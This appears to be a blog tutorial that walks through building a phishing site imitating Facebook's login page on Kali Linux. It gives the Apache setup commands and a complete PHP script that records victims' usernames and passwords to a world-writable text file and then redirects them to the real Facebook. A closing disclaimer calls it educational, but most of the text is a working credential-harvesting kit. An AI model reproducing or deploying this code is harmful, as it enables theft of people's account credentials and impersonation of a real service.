How to Make a Phishing Website That Steals Credentials

Making a phishing website that steals credentials manually can be done very easily. Let’s jump into it!

Requirements:

1. We need a Kali Linux machine.
2. We will run the Apache server.
3. We will need three files: an HTML file, a PHP file, and a Txt file

We will do it step by step!

STEP 1:

1. The first step is to start your Kali Linux machine.
2. We need an HTML file that contains HTML and CSS code.
3. Below is the Code for the Facebook Login Page, so download it:

NOTE: Make sure that the file name should be “index.html“.

STEP 2:

After downloading it, open your Terminal and move to the /var/www/html directory, which is the default directory for the Apache Server’s Configuration files!

cd /var/www/html

There will be an index.html file:

Open the index.html file, remove all the content, and paste the downloaded code! I am using the nano Editor, but you can use whatever you like!

nano index.html

and then Save the File!

STEP 3:

Our one file is complete now, we have to create the remaining two files, so create a Txt file in the same directory:

touch usernames.txt

After creating the “usernames.txt” file, we need to give this file write permissions:

chmod 777 usernames.txt

Now we will create a PHP file, which will capture the login credentials and save them to the txt file, we have to be in the same directory /var/www/html

nano capture.php

Copy the below PHP script, and save it in the “capture.php” file:

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $username = $_POST["username"];
    $password = $_POST["password"];
    
    // Store credentials in a file
    $file = fopen("usernames.txt", "a");
    fwrite($file, "Username: " . $username . " | Password: " . $password . "\n");
    fclose($file);
    
    // Redirect to real Facebook
    header("Location: https://www.facebook.com");
    exit();
}
?>

Once the file is saved, we have to give it some permissions to execute correctly and avoid errors:

chmod 777 capture.php

So, now you will have three files in the /var/www/html directory: a “usernames.txt” file, a “capture.php” file, and an “index.html” file.

NOTE: Make sure that file names are the same as I mentioned above to avoid errors.

STEP 4:

Let’s run the Apache server:

systemctl start apache2

If no error is displayed, it means that the Apache server is running!

-> Run the “ifconfig” command -> note the IP address -> go to Firefox and paste it!

Let’s Test if it is working or not!

Once you press Log in, it will redirect you to the official Facebook page and the credentials which were entered will be stored in the “usernames.txt” file! let’s see it!

Congratulations! it’s working well!

Disclaimer:

This article is for educational purposes only. The information provided in this blog is intended to help cybersecurity enthusiasts, ethical hackers, understand how phishing attacks work so they can better protect themselves and others.

Unauthorized use of phishing techniques is illegal and unethical. The author and this website do not encourage or support any illegal activities.

By following this tutorial, you agree that you will use this knowledge responsibly and only for ethical hacking, penetration testing (with proper authorization), or educational purposes. If you misuse this information, you are solely responsible for your actions.

Stay ethical, stay legal.